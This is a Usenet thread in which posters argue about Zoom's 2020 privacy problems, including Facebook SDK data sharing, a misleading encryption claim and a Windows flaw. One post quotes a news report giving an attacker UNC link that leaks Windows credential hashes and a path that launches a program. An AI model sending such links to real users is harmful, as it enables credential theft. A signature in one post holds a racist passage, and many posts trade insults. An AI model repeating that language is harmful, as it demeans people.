Zoom shares your data with Facebook.

[collector]

It's enough to have their app on smartphone without even using
it.

https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-
data-with-facebook-even-if-users-dont-have-an-account

[Andy Burns]

collector wrote:

> It's enough to have their app on smartphone without even using
> it.

I'd expect thousands of android apps use the Facebook SDK and do the
same, they're all just as bad, so why single out Zoom?

[chrisv]

Why do thousands of apps use the "Facebook SDK"?

--
"ABC News last night led with stories about the black morons. Now
that they've dispersed, New Orleans is safe (only 1 murder in 3
months), but the cities that took their stinking, thieving, lazy,
criminal asses in are experiencing crime waves. It was truly
disturbing to see the fat she-beasts with 6 kids living in a nice
FEMA-paid-for hotel (that they're about to be evicted from - finally!)
talking about 'dey needs a place to stay wif dere chirren'" - DFS

[nospam]

In article <l1c68f9vk4v3n152b...@4ax.com>, chrisv

<chr...@nospam.invalid> wrote:

> Why do thousands of apps use the "Facebook SDK"?

for analytics, sign in with facebook instead of requiring the user to
create yet another account, monetizing via ads, directly sharing
content to the user's facebook page, among other things.

[nospam]

In article <hegjca...@mid.individual.net>, Andy Burns

<use...@andyburns.uk> wrote:

>
> > It's enough to have their app on smartphone without even using
> > it.
>
> I'd expect thousands of android apps use the Facebook SDK and do the
> same,

yep, it's extremely common, and not just apps but also on websites too.

> they're all just as bad, so why single out Zoom?

because they're sleazier than most and got caught.

[Hergen Lehmann]

Am 31.03.20 um 13:58 schrieb chrisv:

> Why do thousands of apps use the "Facebook SDK"?

In most cases to get ad revenue in exchange for customer data. In rare
cases also to provide Facebook-related functionality.

From the perspective of the app developer, Facebook is just an
alternative to using the Google advertisement framework, which does
basically the same.

From the perspective of the consumer, there is a huge difference in the
reputation of both companies and the frequency of privacy scandals
popping up.

[nospam]

In article <hkpblg-...@hergen.dyndns.org>, Hergen Lehmann

<hlehmann.e...@snafu.de> wrote:

>
> From the perspective of the consumer, there is a huge difference in the
> reputation of both companies and the frequency of privacy scandals
> popping up.

very little difference, actually.

[Chris]

That article is out-of-date. Zoom have already fixed the issue and will
be removing the FB SDK.

<https://www.vice.com/en_us/article/z3b745/zoom-removes-code-that-sends-data-to-facebook>

[nospam]

In article <r5vff3$rb8$1...@dont-email.me>, Chris <ithi...@gmail.com>

wrote:

> > It's enough to have their app on smartphone without even using
> > it.
> >
> > https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-
> > data-with-facebook-even-if-users-dont-have-an-account
>
> That article is out-of-date. Zoom have already fixed the issue and will
> be removing the FB SDK.

*plenty* of other issues remain.

[Arlen Holder]

In response to what Chris <ithi...@gmail.com> wrote :

> That article is out-of-date. Zoom have already fixed the issue and will
> be removing the FB SDK.
>
> <https://www.vice.com/en_us/article/z3b745/zoom-removes-code-that-sends-data-to-facebook>

Why do people on this thread incessantly bullshit, sans a _single_ fact backing up their claims?
o Is the belief system of these constant bullshitters always based on exactly zero (0) facts?

More to the point...
*Has anyone noticed the cited article mention only iOS & not _any_ other consumer OS*?
o *While participants in this thread seem to assume all Zoom OS ports are affected*?

(HINT: Most people who posted to this thread are classic bullshitters - devoid of facts).
o Their credibility is utterly worthless - it's worse than the result of a coin toss!.

I had tested Zoom last week for use with our local Great Book's group, &
summarily dropped it after realizing the free version was limited to 40
minutes if something like more than 3 people (roughly) attended a meeting.
o What is a privacy-aware cross platform free personal
video-tele-conference app to host & join meetings
of about a dozen participants discussing Great Books?
<https://groups.google.com/d/msg/misc.phone.mobile.iphone/EnY3WsFGaZc/425vqdEtAwAJ>
... ... ... ... ... ...
FACTS:
But since I care about privacy, I read the VICE article suggested above:
... ... ... ... ... ...
o Zoom Removes Code That Sends Data to Facebook
<https://www.vice.com/en_us/article/z3b745/zoom-removes-code-that-sends-data-to-facebook>
"The change comes after Motherboard found *the Zoom iOS app* was sending
analytics information to Facebook when users opened the app."

"it sent information such as when a user opened the app, their timezone,
city, and device details"

"included data about users' devices such as the mobile OS type and
version, the device time zone, device OS, device model and carrier,
screen size, processor cores, and disk space," Zoom's statement added,
mirroring Motherboard's findings"

"Zoom's privacy policy did not make the data transfer to Facebook clear"
... ... ... ... ... ...
FACTS:
Reading the source, we find also that Motherboard *only mentions iOS*.
o Why to participants assume other OS' when _only_ iOS is noted?
... ... ... ... ... ...
o Zoom iOS App Sends Data to Facebook Even if You Donÿt Have a Facebook Account
<https://www.vice.com/en_us/article/k7e599/zoom-ios-app-sends-data-to-facebook-even-if-you-dont-have-a-facebook-account>
"the iOS version of the Zoom app is sending some analytics data to
Facebook, even if Zoom users don't have a Facebook account"

"The Zoom app notifies Facebook when the user opens the app,
details on the user's device such as the model, the time zone and city
they are connecting from, which phone carrier they are using, and a
unique advertiser identifier created by the user's device"

Note: This is (yet again) another FACT Apple Marketing doesn't talk about
as to why iOS privacy sucks compared to Android, in that there is no
practical way on iOS to remove that privacy hole in iOS, whereas, in
Android, it's trivial to remove the Advertiser ID and still have full
functionality of the Android device:
o More reason NOT to have an Advertising ID or Ads on your mobile device
based on an expose for the USA & the UK (and others) in the Wall Street
Journal today
<https://groups.google.com/forum/#!topic/misc.phone.mobile.iphone/9M5UuoiOMw8>

This followup article also only mentions iOS, so why do participants of
this thread assume other OS' are involved?

o Zoom Removes Code That Sends Data to Facebook
<https://www.vice.com/en_us/article/z3b745/zoom-removes-code-that-sends-data-to-facebook>
"The change comes after Motherboard found the Zoom iOS app was sending
analytics information to Facebook when users opened the app."

... ... ... ... ... ...
FACTS:
*Why does this article also only mention iOS, and no other consumer OS*?
... ... ... ... ... ...
o Zoom iOS app quietly sending data to Facebook, even if you have no
account [Update: Fixed]
<https://9to5mac.com/2020/03/27/zoom-ios-app/>
"The Zoom iOS app is sharing data with Facebook, without declaring it in
the privacy policy.
This happens whether or not you have a Facebook account."

"Data shared with Facebook includes your iPhone or iPad model,
your time-zone, city, phone carrier and a unique identifier"

"Zoomÿs policy says the company may collect userÿs ´Facebook profile
information (when you use Facebook to log-in to our Products or to
create an account for our Products),¡ but doesnÿt explicitly mention
anything about sending data to Facebook on Zoom users who donÿt
have a Facebook account at all."

"Itÿs not the first time there has been a privacy issue with Zoom.
A major vulnerability last year meant that websites were able to
activate Mac webcams without first asking permission. "
... ... ... ... ... ...
FACTS:
*It's the same across the board that _only_ the iOS app was affected.*
... ... ... ... ... ...
o Zoom updates iOS app to remove code that sent device data to Facebook
<https://www.theverge.com/2020/3/28/21197967/zoom-ios-app-code-tracking-facebook>
"According to a blog post by Zoom CEO Eric S. Yuan, Zoom implemented its
´Login with Facebook¡ feature using Facebookÿs software development kit
(SDK) for iOS."

"Users should update the iOS app to the latest version for the change
to take effect"

... ... ... ... ... ...
FACTS:
Even Microsoft-based shills only mention the iOS app.
... ... ... ... ... ...
o Zoomÿs iOS app is sharing data with Facebook even if you donÿt have a Facebook account
<https://mspoweruser.com/zoom-ios-app-reportedly-sharing-user-data-facebook/>
"Zoomÿs iOS app is sharing analytics data with Facebook even when the
user doesnÿt have a Facebook account."

Summary:
o People seem to have _assumed_ this problem was rampant in other OS's.
o But _none_ of the cites back up that presumed assumption of theirs.
o The problem stated wasn't the Zoom iOS app used the Facebook SDK.
o The problem was the iOS app didn't _inform_ the users.

So why do people bullshit, sans a _single_ fact backing up their claims?
o Is there belief system always based on exactly zero (0) facts?
--
The Usenet, unfortunately, is filled with ill educated people whose
credibility turns out to be worse than the result of a coin toss, simply
due to their own fantastic propensity to bullshit every moment of their
lives.

[nospam]

In article <r5vi80$85l$1...@news.mixmin.net>, Arlen Holder

<arlen...@anyexample.com> wrote:

>
> I had tested Zoom last week for use with our local Great Book's group, &
> summarily dropped it after realizing the free version was limited to 40
> minutes if something like more than 3 people (roughly) attended a meeting.

it's not. they removed the 40 min limit due to the pandemic.

>
> So why do people bullshit, sans a _single_ fact backing up their claims?

you're the only one that can answer that.

> o Is there belief system always based on exactly zero (0) facts?

'their'

[Arlen Holder]

In response to what Andy Burns <use...@andyburns.uk> wrote :

> I'd expect thousands of android apps use the Facebook SDK and do the
> same, they're all just as bad, so why single out Zoom?

*Doesn't _anyone_ who posts to this ng _ever_ actually _read_ the cites?*
o /If they read the cites, why don't they seem to _comprehend_ what the cites claim?/

Every _adult_ would clearly easily realize the cites said (paraphrased):
o We're talking about the Zoom app in this thread & in the cites provided
o Where all the cites & those I found mentioned _only_ the Zoom iOS app

The problem doesn't appear to be the iOS Zoom app's use of the Facebook SDK
but that the iOS Zoom app didn't tell iOS users that critical iOS details
like their location & unique iOS Advertiser ID is being sent to Facebook
not only without the iOS users' knowledge, but even for iOS users (like me)
who don't even have a Facebook account.

My takeaway, which _adults_ can reasonably & logically argue with is:
o It's yet again why you don't want an Advertiser ID on your device!

But since people are instantly blaming Android for an iOS flaw, we may as
well ask the basic adult question of all five of the common consumer OSs.

1. Does iOS allow full functionality when you remove the Advertiser ID?
(We already know the answer since we've discussed this on the iOS ng.)

2. Does Android allow full functionality when you remove the Advertiser ID?
(We also discussed this on the Android ng and so we know the answer.)

3. Does Linux (e.g., Ubuntu) have a unique non-removable Advertiser ID?
(I do not personally know the answer to that relevant question: Do you?)

4. Does Windows (e.g., Win10) have a unique non-removable Advertiser ID?
(I do not personally know the answer to that relevant question: Do you?)

5. Does the MacOS have a unique non-removable Advertiser ID?
(I do not personally know the answer to that relevant question: Do you?)
--
Note: Nonremovable means, for this purpose, if you remove it you lose
critical functionality that can't easily be replaced otherwise.

[Arlen Holder]

In response to what nospam <nos...@nospam.invalid> wrote :

>> Why do thousands of apps use the "Facebook SDK"?
>
> for analytics, sign in with facebook instead of requiring the user to
> create yet another account, monetizing via ads, directly sharing
> content to the user's facebook page, among other things.

Hi nospam,

*Did _any_ of you actually _read_ (or comprehend) what the article said*?

HINT: It wasn't the use of the Facebook SDK that was the problem.

The problem cited in the article was that the iOS Zoom app approved by
Apple for download on the iTunes App Store broke both Facebook's and Zoom's
privacy policy.

In addition, I claim another huge and directly related iOS privacy problem
that Apple MARKETING will never tell you is that, on iOS, you can't remove
the unique Advertiser ID (without essentially eliminating the iOS device's
ability to download software), whereas it's trivial to remove (and still
have full software download functionality) on Android (I'm not sure about
Linux, Windows, or MacOS though).

Apple MARKETING loudly proclaims the few links where they're more private
o Yet, completely ignores the many links where they're far less private.

The Advertiser ID, I claim (with proof), is one of those less private
links, where, in the case of this errant Zoom app, clearly was used.
(see my previous cites elsewhere in this thread for that proof)
--
Don't any of the people who blame everyone else for flaws on iOS apps ever
actually read (or comprehend?) the articles they use to blame everyone else
for Zoom's iOS app flaws?

[Arlen Holder]

In response to what nospam <nos...@nospam.invalid> wrote :

>> From the perspective of the consumer, there is a huge difference in the
>> reputation of both companies and the frequency of privacy scandals
>> popping up.
>
> very little difference, actually.

Hi nospam,

*One _huge_ difference in privacy*...
... *that Apple MARKETING will _never_ tell you*...

... is that on iOS you can't easily remove the Advertiser ID (without
essentially losing all app download functionality) - where that FACT is
relevant since this Zoom iOS app was said (in the cited articles) to be
sending this Apple-created Advertiser ID (in addition to iOS users'
location and other iOS users' data) even for iOS users (like me) who don't
even own a Facebook account.

On Android, it's trivial to not only easily eliminate the Advertiser ID,
but you never need to even set up the Advertiser ID in the first place, and
yet, you still have full app functionality using freely available common
replacement apps (which we have many threads on so if you disagree, I'll
simply cite the threads you already are well aware of, nospam).

I'm not sure whether the other common consumer OS's even have a unique
Advertiser ID though, nor if it's as easily destroyed as it is on Android
(and still maintain full functionality of the device):
o Windows?
o Linux?
o MacOS?

Do they?
--
On Usenet, there are bullshitters galore, but few adults who speak facts.

[Joerg Lorenz]

Am 31.03.20 um 15:09 schrieb Chris:

Nomen Nescio - who ever that is - is a usenetwide known Troll who uses
anonymous Troll servers to spread fake news.
I adjusted my filters accordingly. ;-)

[nospam]

In article <r5vkh9$d4f$1...@news.mixmin.net>, Arlen Holder

<arlen...@anyexample.com> wrote:

>
> On Android, it's trivial to not only easily eliminate the Advertiser ID,

that doesn't do what you might think it does.

you're still being tracked.

[Arlen Holder]

In response to what nospam <nos...@nospam.invalid> wrote :

> it's not. they removed the 40 min limit due to the pandemic.

Hi nospam,

*Please clarify since you bullshit so much, your credibility is worthless*.
o Nothing you say can be trusted any more than a brainless coin toss guess.

Unlike ill-educated bullshitters who incessantly bullshit, I speak facts.
o Easily verified facts, in fact.
<https://i.postimg.cc/k5gKvsTM/timeout01.jpg>
<https://i.postimg.cc/NMfycj3g/timeout02.jpg>

The problem with innate incessant bullshitters like you, nospam, is your
belief systems are often proved to be wholly imaginary, based on exactly
zero (0) facts - where you often can't find a _single_ fact that forms the
entire basis of your strongly held but completely imaginary belief systems.
<https://groups.google.com/d/msg/misc.phone.mobile.iphone/EnY3WsFGaZc/CDR5-0GLAwAJ>

Imaginary belief systems are easily destroyed by 3 simple words asking for
at least one fact that forms the entire basis of your stated belief system:
o Name just one.

As you're well aware, I had tested Zoom last week on multiple platforms:
<https://groups.google.com/forum/#!topic/misc.phone.mobile.iphone/EnY3WsFGaZc>

As you're well aware, as a result of my tests, I had posted my own
screenshots showing Zoom had (apparently temporarily, and seemingly as a
marketing gimmick) removed the 40-minute limit in my specific meetings
where, since I don't bullshit like you incessantly do, nospam, these are my
own screenshots that I had posted to that thread at that time:
<https://i.postimg.cc/8CBm9Yqz/zoom03.jpg>
<https://i.postimg.cc/sgWc9xmS/zoom02.jpg>

As you also are aware, since I don't bullshit like you incessantly do, I
even posted links and verbatim quotes of Zoom's policy on that 40-minute
limit, which I just looked at again, and they _still_ say the same thing:
o Why is my meeting timing out?
<https://support.zoom.us/hc/en-us/articles/201362523-Why-is-my-meeting-timing-out->
"If you are a Licensed user and join a meeting and the meeting is hosted
by a Basic user. The meeting will have a *40-minute restriction*."
<https://i.postimg.cc/k5gKvsTM/timeout01.jpg>

o Will My Meeting Time Out?
<https://support.zoom.us/hc/en-us/articles/202460676-Will-My-Meeting-Time-Out->
"Free Licenses (Basic) Meeting timeout at 24 hours:
1 host, no participant, 1 host, 1 participant,
No host, 2 participants (join before host)
*Meeting timeout at 40 minutes*:
1 host, 2 participants or more at the same time
0 host, 3 participants or more at the same time(join before host)
Note: If participants leave the meeting and join again before their
first connection is fully terminated, it may count them as two different
participants and trigger the 40-minute time limit."
<https://i.postimg.cc/NMfycj3g/timeout02.jpg>

Given those facts that Zoom "may" temporarily extend your meeting under
circumstances at their whim (which is a classic marketing maneuver)... and
yet, given those facts about their 40-minute policy (which are the same
today as they were when I posted them in the thread you were on)...

Did you just try to bullshit us again, nospam?

Please clarify:
*Are you now claiming Zoom _permanently_ removed that 40 minute limit*?
*Are you now claiming Zoom _completely_ removed it for the Covid-19 duration*?

If so, where in Zoom's policies did you actually "see" that claimed policy?

Please clarify by citing at least one _fact_ from Zoom that forms the basis
of your entire stated (but almost always imaginary) belief system.
o Name just one
--
Usenet is filled with people like nospam who are so ill educated that they
often form the basis of their belief systems on exactly zero (0) facts.

The simplest test of an imaginary belief sytem is to ask for one (1) fact.

[anon]

We are in desperate need for a pfSense type firewall for android. Or a new OS that can run android apps. This spying crap by China and unscrupulous, greedy people and corporations needs to be stopped.

[Arlen Holder]

In response to what Joerg Lorenz <hugy...@gmx.ch> wrote :

> Nomen Nescio - who ever that is - is a usenetwide known Troll who uses
> anonymous Troll servers to spread fake news.
> I adjusted my filters accordingly. ;-)

Hi Joerg Lorenz,

I've been studying you Apple Apologists for decades...

While you apologist almost always innately & incessantly instantly attack
the messenger of fact (where we all know the messenger is a troll), the
_facts_ by that messenger on the iOS app's flaws are still correct, are
they not?

*So why not address the actual facts as an adult would, should, & could*?
o Instead of being completely _immune_ to all facts you simply don't like?

FACTS:
a. The Apple iTunes App store vetted an iOS Zoom app
b. Which was found to be violating both Zoom's & Facebook's privacy policy.

Is that fact about that iOS app's privacy flaws not a fact Joerg Lorenz?
o Just because the messenger of that fact happens to be a troll?

For background...

The _adults_ on this newsgroup will note that Joerg Lorenz is a noted ill
educated Apple Apologist, who, like most Apple Apologists, instantly blames
_everyone_ but Apple for flaws found on their beloved iOS operating system.

These Apple Apologists _hate_ that iOS isn't what Apple claimed it was.
o So they incessantly blame everyone else for the flaws that exist.

NOTICE: Almost never do the Linux or Windows or Android users ever blame
Apple for flaws found on their respective operating systems!

It's only on the Apple newsgroups where it's extremely common for the Apple
users to instantly blame everyone else for the flaws found on their system.

Why?
o I don't know why.

I suspect their common behavior to blame everyone else is because Apple
users _hate_ that the products on their platform are often found to be no
better than the products on other platforms, where that's a key reason,
IMHO, why they instantly blame anything and everything else, whenever a
flaw is found on their beloved operating system.

They were told (by brilliant Apple MARKETING) the products were better...
o And yet, the facts easily prove ... they're not.

So they _hate_ that fact...
o And hence, they instantly & consistently blame messengers of that fact.
--
The adults on this ng, will note that Joerg attacks the messenger, where
Joerg Lorenz is on record for not trusting _any_ statement about iOS that
he hates, where the canonical example was when Joerg Lorenz claimed that he
doesn't believe anything the BBC writes, preferring, instead, to trust the
German media only (even as Joerg is apparently based in Switzerland).

[rmd]

>
> On 31/03/2020 09:02, collector wrote:
>
>> It's enough to have their app on smartphone without even using
>> it.
>>
>> https://appleinsider.com/articles/20/03/26/zoom-for-ios-shares-
>> data-with-facebook-even-if-users-dont-have-an-account
>
> That article is out-of-date. Zoom have already fixed the issue and will be removing the FB SDK.
>

...now that they have been caught out.

[123456789]

On nospam wrote:

> Arlen Holder wrote:

>> o Is there belief system always based on exactly zero (0) facts?

> 'their'

Usenet spelling cops are assholes.

Did I get that sentence spelled right?

[Arlen Holder]

In response to what nospam <nos...@nospam.invalid> wrote :

>> On Android, it's trivial to not only easily eliminate the Advertiser ID,
>
> that doesn't do what you might think it does.

Hi nospam,

I've studied you strange apologists for years, nospam...
o Much as Dunning & Kruger studied the strange lemon-juice bank robber.

You _hate_ facts about iOS - which then drives almost all your responses.
o You hate Apple products aren't what Apple MARKETING implied they were!

IMHO...
o Every response from you can be traced back to that simple observation.

Play all the silly games you want nospam: the facts remain:
o If you don't set up the Android settings to a Google Account
o *Then the Android Advertising ID simply does not exist*.
o And yet, you still have full functionality of that phone.
(via replacement apps for the few Google apps prior noted)

Summary:
You can still have all the Google Accounts you want; and you can use them
on your Android phone in most (almost all non-Google) apps; you just don't
point the Android OS to that Google Account in the Android settings - and
then there is no Android Advertiser ID, period.
o *The Android Advertising ID simply does not exist*.

Play all the silly games about iOS you want, nospam, the fact remains:
o You can remove the iCloud account on iOS devices too
o But you then lose the ability to download apps to that iOS device
o Which means it's functionally not pragmatic on iOS.

I realize you apparently _hate_ this simple fact nospam.
o But the fact you hate facts doesn't change that they're still facts.
--
Apologists hate that Apple products often aren't what MARKETING implied.

[Nomen Nescio]

In article <r5vmp4$i1e$1...@news.mixmin.net>

[Arlen Holder]

In response to what nospam <nos...@nospam.invalid> wrote :

>> I'd expect thousands of android apps use the Facebook SDK and do the
>> same,
>
> yep, it's extremely common, and not just apps but also on websites too.

Hi nospam,

a. Adults should be able to read & comprehend facts
b. Adults should then form their belief systems based on those facts.

I've studied you rather strange ill-educated fact-free apologists for years...
o What are the common well-verified psychological traits of the Apple Apologists on this newsgroup?
<https://groups.google.com/d/msg/misc.phone.mobile.iphone/18ARDsEOPzM/veU8FwAjBQAJ>

It's a common trait of ill-educated apologists to instantly blame everyone else.
o Why do both Apple & the apologists habitually blame everyone but Apple for Apple's poor design choices?
<https://groups.google.com/d/msg/misc.phone.mobile.iphone/Iee15bZl49I/i8xeBobOAAAJ>

On the linux ng, nobody incessantly blames Apple for Canonical flaws.
On the windows ng, nobody incessantly blames Apple for MS flaws.
On the Android ng, nobody incessantly blames Apple for Google flaws.

It's only when Apple flaws are discussed that you strange ill-educated
fact-free apologists instantly and incessantly blame everyone but Apple for
flaws found to be on your beloved highly marketed iOS operating system.

Why?
o I don't know why.

I suspect you strange ill educated fact-free apologists _believed_ what
Apple MARKETING fed you to believe ... and hence ...

When facts are found out ... you _hate_ those facts ... so much ... that
o You incessantly instantly blame everyone else for flaws on your beloved iOS.

It's well established you hate facts, nospam.
o But the fact you hate facts doesn't change the fact they're still facts.

The facts in this case appear to be:
1. Apple vetted this iOS Zoom app on the Apple iTunes App Store;
2. This Apple-vetted iOS Zoom app did not comply with its own privacy policy;
3. For Zoom, no other OS but iOS appears to be implicated (as far as has been cited).
--
Apologists hate that Apple products aren't what MARKETING said they were.

[Arlen Holder]

The adult question is...
o *Why*?

Reading (and comprehending) the given cites, the facts in this case appear to be:

1. Apple vetted this iOS Zoom app on the Apple iTunes App Store;
2. This Apple-vetted iOS Zoom app did not comply with its own privacy policy;

3. For Zoom, only iOS appears to be implicated (as far as has been cited).

The adult technical question, related to the ng list, is the obvious question:
o *Why*?

Why is it _only_ the iOS app that has been implicated in this privacy flaw?
o *What's _different_ for coding logins on iOS that caused Zoom to need this*?
--
I can easily guess why; but the adult question is whether anyone really knows why?

[nospam]

In article <hehbb6...@mid.individual.net>, Jolly Roger

> Zoom already lost all credibility and trust when they got caught
> red-handed installing unsecured web servers on people's machines that
> anyone could use to access their cameras.
>
> Zoom Zero Day: 4+ Million Webcams & maybe an RCE? Just get them to visit your
> website!
>
> <https://medium.com/bugbountywriteup/zoom-zero-day-4-million-webcams-maybe-an-
> rce-just-get-them-to-visit-your-website-ac75c83f4ef5>
>
> Apple is silently removing Zoomąs web server software from Macs
>
> <https://www.theverge.com/2019/7/10/20689644/apple-zoom-web-server-automatic-r
> emoval-silent-update-webcam-vulnerability>
>
> Fuck Zoom for thinking doing shit like this would be okay.

they still haven't learned their lesson.

their installer installs the app entirely in a pre-flight script with a
fake system message, thereby preventing the user from consenting or
declining during the normal install process.

they also fraudulently claim the video is end to end encrypted, when it
is clearly not. in their world, 'end' is you and zoom's servers, giving
them not only the ability to see your video, but to store it for their
later perusal.


<https://appleinsider.com/articles/20/03/31/zoom-macos-install-shady-plu
s-video-chats-arent-end-to-end-encrypted>
Twitter user @c1truz_, technical lead for malware tracker VMRay,
reports that Zoom's Mac app installer uses preinstallation scripts
and allegedly displays a faked macOS system message.

"This is not strictly malicious, but very shady and definitely leaves
a bitter aftertaste," continues @c1truz_, "The application is
installed without the user giving his [or her] final consent and a
highly misleading prompt is used to gain root privileges."

...

Separately, The Intercept alleges that Zoom is claiming to have
end-to-end encryption for its video conference calls, but does not.

Rather than truly end to end encryption, where the entire video chat
can only be seen by the caller and his or her recipients, Zoom is
reportedly doing what's called transport encryption. This makes the
connection between the users and Zoom's servers encrypted, but
doesn't prevent Zoom itself seeing the calls.

A Zoom spokesperson confirmed this to The Intercept, responding
that "currently, it is not possible to enable E2E encryption for Zoom
video meetings."

"When we use the phrase 'End to End' in our other literature, it is
in reference to the connection being encrypted from Zoom end point
to Zoom end point," the Zoom spokesperson continued.

[nospam]

In article <r5vpb9$o30$1...@news.mixmin.net>, Arlen Holder

<arlen...@anyexample.com> wrote:

>
> >> On Android, it's trivial to not only easily eliminate the Advertiser ID,
> >
> > that doesn't do what you might think it does.
>

> You _hate_ facts about iOS

the topic is android.

[Arlen Holder]

In response to what Jolly Roger <jolly...@pobox.com> wrote :

> Zoom already lost all credibility and trust when they got caught
> red-handed installing unsecured web servers on people's machines that
> anyone could use to access their cameras.
>
> Zoom Zero Day: 4+ Million Webcams & maybe an RCE? Just get them to visit your website!
> <https://medium.com/bugbountywriteup/zoom-zero-day-4-million-webcams-maybe-an-rce-just-get-them-to-visit-your-website-ac75c83f4ef5>
>

> Apple is silently removing Zoom┬ web server software from Macs

> <https://www.theverge.com/2019/7/10/20689644/apple-zoom-web-server-automatic-removal-silent-update-webcam-vulnerability>
>
> Fuck Zoom for thinking doing shit like this would be okay.

Based on those two cites, a key adult very obvious question to ask is:
o *Why*?

Reading Jolly Roger's two supplied cites for comprehension...
o Notice Jolly Roger instantly innately blames only Zoom ... & not MacOS.

And yet, both of Jolly Roger's cites apply _only_ to MacOS!
o Zoom Zero Day: 4+ Million Webcams & maybe an RCE?
<https://medium.com/bugbountywriteup/zoom-zero-day-4-million-webcams-maybe-an-rce-just-get-them-to-visit-your-website-ac75c83f4ef5>
"A vulnerability in the *Mac Zoom Client* allows any malicious website
to enable your camera without your permission."

o Apple is silently removing Zoom┬ web server software from Macs
<https://www.theverge.com/2019/7/10/20689644/apple-zoom-web-server-automatic-removal-silent-update-webcam-vulnerability>
"basically, Apple stepped in because it knew a ton of people were still
going to be vulnerable after they uninstalled Zoom"

The key _adult_ technical question to ask is...
o *Why is Zoom able to add these privacy flaws only in Apple devices*?
(as far as has been cited in this thread anyway).

Why isn't anyone citing the same Zoom privacy flaws in non-Apple OS's?
o *What's _different_ about Apple OSs that forces Zoom to add privacy flaws*?
--
HINT: Zoom's CISO Richard Farley claimed, in essence, MacOS is click intensive.

[Arlen Holder]

In response to what nospam <nos...@nospam.invalid> wrote :

> the topic is android.

Hi nospam,

*There's a _reason_ Zoom targeted Apple products for these privacy flaws*.

The newsgroups this thread is posted to are:
o <http://misc.phone.mobile.iphone.narkive.com>
o <http://alt.comp.os.windows-10.narkive.com>
o <http://comp.os.linux.advocacy.narkive.com>
o <http://comp.mobile.android.narkive.com>
o <http://alt.privacy.anon-server.narkive.com>

Which, together, comprise:
o *Apple* <http://tinyurl.com/misc-phone-mobile-iphone>
o *Windows* <http://tinyurl.com/alt-comp-os-windows-10>
o *Linux* <http://tinyurl.com/comp-os-linux-advocacy>
o *Android* <http://tinyurl.com/comp-mobile-android>
o *Privacy* <http://tinyurl.com/alt-privacy-anon-server>

The topic is Zoom felt the need, only on iOS (based on the cites) to employ
the iCloud-based Advertiser ID (and other information such as location
data), to send to Facebook, even for people (like me) who don't even own a
Facebook account.

*You may not like the fact this didn't happen on Android*...
o But the fact you hate facts doesn't change the fact they are still facts.

FACT:
o *This sending of the Advertising ID _only_ happened on the Zoom iOS app*
(there is no cite yet in this thread that claims it happened on Android).

FACT:
o It's trivial to completely eliminate the Advertising ID on Android
(and still have full functionality of the device)

The obvious _adult_ technical question to ask is...
o *Why*

Why are all these Zoom privacy flaws only found on the Apple products?
o I don't know why - but the articles certainly provide hints.

HINT:
I'm waiting for other _adults_ to pick up on _why_ Zoom specifically aims
at Apple products for implementing these cited privacy flaws which they
then have to remove functionality in order to remove the privacy flaw.
--
There's a _reason_ Zoom targeted Apple products for these privacy flaws.

[nospam]

In article <r5vveu$66t$1...@news.mixmin.net>, Arlen Holder

<arlen...@anyexample.com> wrote:

> The topic is Zoom felt the need, only on iOS (based on the cites) to employ
> the iCloud-based Advertiser ID (and other information such as location
> data),

their privacy breaches exist on all platforms and do not need any
advertiser id either.

> to send to Facebook, even for people (like me) who don't even own a
> Facebook account.

facebook already created one for you.

> *You may not like the fact this didn't happen on Android*...

yes it did.

[Arlen Holder]

In response to what nospam <nos...@nospam.invalid> wrote :

>> *You may not like the fact this didn't happen on Android*...
>
> yes it did.

Hi nospam,

You ill-educated fact-free apologists always make these brazen claims...
o Sans even a _single_ fact upon which your imaginary beliefs are based.

Your belief system almost always proves to be entirely imaginary.
o Without even one (1) fact you used to form your entire belief system!

Hence, facts DESTROY your belief systems, which is why you fear facts.
o Just like flat earthers...

Name just one cite that claims what you appear to have claimed, which is
that this Zoom AdvertisingID Facebook privacy flaw exists on the Android
Zoom app.

Name just one.
--
Bullshitters like nospam always fail this simple 3-word adult test of their
wholly imaginary (but strongly held) belief systems.

[Mayayana]

"rmd" <rem...@not-for-mail.invalid> wrote

| > That article is out-of-date. Zoom have already fixed the issue and will
be removing the FB SDK.
| >
| ...now that they have been caught out.
|

Indeed. Here's another one, about reckless data sharing:

https://www.vice.com/en_us/article/k7e95m/zoom-leaking-email-addresses-photos

There's probably sleaze but it sounds more like gross
incompetence. This new problem seems to be connected
with a bad assumption that email addresses used are
company addresses and can thus be accessed by
other people with email in the same domain!

They're talking about photos, too. What kind of
nut gives a photo to a company like Zoom? The bland
naivety of people online never ceases to amaze.

[Arlen Holder]

End-to-End encryption for Zoom means not what it means to most of us...

The Verge reported today the definition of "end to end encryption" means
different things to Zoom than it does to the rest of the world.
o *Zoom isn't actually end-to-end encrypted*
<https://www.theverge.com/2020/3/31/21201234/zoom-end-to-end-encryption-video-chats-meetings>

"the term end-to-end encryption typically refers to protecting content
between the users entirely with no company access at all, similar to
Signal or WhatsApp. Zoom does not offer that level of encryption,
making its use of 'end-to-end' highly misleading.

Zoom, however, denies that it's misleading users. The company told
The Intercept, When we use the phrase 'End to End' in our other

literature, it is in reference to the connection being encrypted
from Zoom end point to Zoom end point"

--
Each thread to Usenet should strive to add value to our tribal knowledge.

[Arlen Holder]

More bad news for Zoom privacy reported today - this time on Windows...
o *Zoom for Windows leaks network credentials, runs code remotely*
<https://www.itnews.com.au/news/zoom-for-windows-leaks-network-credentials-runs-code-remotely-545883>

"An attacker can inject a link such as
\\attacker.computer.com\company_salary.xlsx into the chat, should anyone
click on the link it will expose their Windows username, domain name -or-
computer name and a hashed version of their Windows password," Hickey
said..

"An attacker can replay those hashed password values and access services
such as Microsoft Exchange, Outlook Webmail and Sharepoint," he added.

Hickey tested a discovery from another researcher who goes by the _g0dmode
moniker, and who noted it was possible to capture Windows network NT Lan
Manager (NTLM) hashes using the flaw.

Expanding on the prior discovery of the vulnerability, Hickey told iTnews
that it is possible to run commands and install malware on clients.

If an attacker tries to do that, newer versions of Windows will warn users
that a remote code execution attack could be taking place.

For example, it is possible to trigger the classic Windows remote code
execution proof of running the built in calculator app by sending a link
like: \\127.0.0.1\C$\Windows\System32\Calc.exe

Alert dialogs are only displayed for executable files and commands however.

"If an attacker attempts to leak credentials, no such warning is
displayed," Hickey said.

Hickey demonstrated the credentials capture to iTnews.

The flaw affects Zoom's Windows client only, Hickey said. On Apple's macOS,
the Zoom client doesn't make the links clickable.
--
Usenet works best when adults post with purposefully helpful intentions.

[Arlen Holder]

In this article, is advice for consumer's privacy steps while using Zoom:
o *Zoom is a big privacy headache. Here┬ how you can lock it down*
